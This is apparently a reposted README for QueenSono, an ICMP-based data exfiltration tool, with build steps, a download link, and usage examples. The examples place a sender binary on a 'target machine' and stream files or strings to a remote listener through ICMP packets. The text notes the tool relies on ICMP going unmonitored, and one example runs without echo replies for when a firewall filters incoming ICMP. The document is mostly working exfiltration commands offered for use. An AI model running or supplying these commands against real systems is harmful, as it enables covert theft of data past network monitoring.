<a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a><div> </div> QueenSono tool only relies on the fact that ICMP protocol isn't monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher). Try to imitate <a href="https://github.com/ytisf/PyExfil" rel="nofollow" target="_blank" title="PyExfil">PyExfil</a> (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful)<a name='more'></a>&nbsp; Install &gt; Install the binary from source Clone the repo and download the dependencies locally: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/ariary/QueenSono.git make before.build "><pre><code>git clone https://github.com/ariary/QueenSono.git make before.build </code></pre></div> To build the ICMP <a href="https://www.kitploit.com/search/label/Packet%20Sender" target="_blank" title="packet sender">packet sender</a> <code>qssender</code> : <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" build.queensono-sender "><pre><code> build.queensono-sender </code></pre></div> To build the ICMP packet receiver <code>qsreceiver</code> : <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" build.queensono-receiver "><pre><code> build.queensono-receiver </code></pre></div> Usage <code>qssender</code> is the binary which will send ICMP packet to the <a href="https://www.kitploit.com/search/label/Listener" target="_blank" title="listener">listener</a> , so it is the binary you have to transfer on your target machine. <code>qsreceiver</code> is the listener on your local machine (or wherever you could receive icmp packet) All commands and flags of the binaries could be found using <code>--help</code> Example 1: Send with "ACK" &gt; In this example we want to send a big file and look after echo reply to ackowledge the reception of the <a href="https://www.kitploit.com/search/label/Packets" target="_blank" title="packets">packets</a> (ACK). <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/s1350/QueenSono_1_qssono.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-mDD0xXmoAd0/YUup-c0l0aI/AAAAAAAAvSc/KwlmdWaRXWYLWELL21Bz-rh-UIUYPSsuwCNcBGAsYHQ/w640-h270/QueenSono_1_qssono.gif" width="640" /></a></div> On local machine: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt "><pre><code>$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt </code></pre></div> <details> <summary>Explanation</summary> <li> <code>-l 0.0.0.0</code>listen on all interfaces for ICMP packet </li> <li> <code>-f received_bible.txt</code> save received data in a file </li> <li><code>-p</code> show a progress bar of received data </li> </details> On target machine: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example) $ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt "><pre><code>$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example) $ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt </code></pre></div> <details> <summary>Explanation</summary> <li> <code>send file</code> for sending file (<code>bible.txt</code> is the file in question) </li> <li> <code>-d 2</code> send a packet each 2 seconds </li> <li><code>-l 127.0.0.1</code> the listening address for echo reply </li> <li><code>-r 10.0.0.92</code> the address of my remote machine with <code>qsreceiver</code> listening</li> <li><code>-s 50000</code> the data size I want to send in each packet</li> </details> Example 2: Send without "ACK" &gt; In this example we want to send a message without waiting for echo reply (it could be useful in case the target <a href="https://www.kitploit.com/search/label/Firewall" target="_blank" title="firewall">firewall</a> filters incoming icmp packet) <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/s1350/QueenSono_2_qssono-trunc.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="571" data-original-width="1350" height="270" src="https://1.bp.blogspot.com/-p5_2_IEv9P8/YUuqKRcI1rI/AAAAAAAAvSg/hsnZHGNuRTEP9G-_v8lbWCSQYvVXbj3XQCNcBGAsYHQ/w640-h270/QueenSono_2_qssono-trunc.gif" width="640" /></a></div> On local machine: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ qsreceiver receive truncated 1 -l 0.0.0.0 "><pre><code>$ qsreceiver receive truncated 1 -l 0.0.0.0 </code></pre></div> <details> <summary> Explanation</summary> <li><code>receive truncated 1</code> does not wait indefinitely if we don't received all the packets. (<code>1</code> is the delay used with <code>qssender</code>)</li> </details> On target machine: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ qssender send &quot;thisisatest i want to send a string w/o waiting for the echo reply&quot; -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N "><pre><code>$ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N </code></pre></div> <details> <summary>Explanation</summary> <li> <code>-N</code> noreply option (don't wait for echo reply) </li> </details> Notes <ul> <li>only work on Linux (due to the use of golang net icmp package)</li> <li>need <code>cap_net_raw capabilities</code></li> </ul> <div style="text-align: center;"><a class="kiploit-download" href="https://github.com/ariary/QueenSono" rel="nofollow" target="_blank" title="Download QueenSono">Download QueenSono</a></div>

Tag

#QueenSono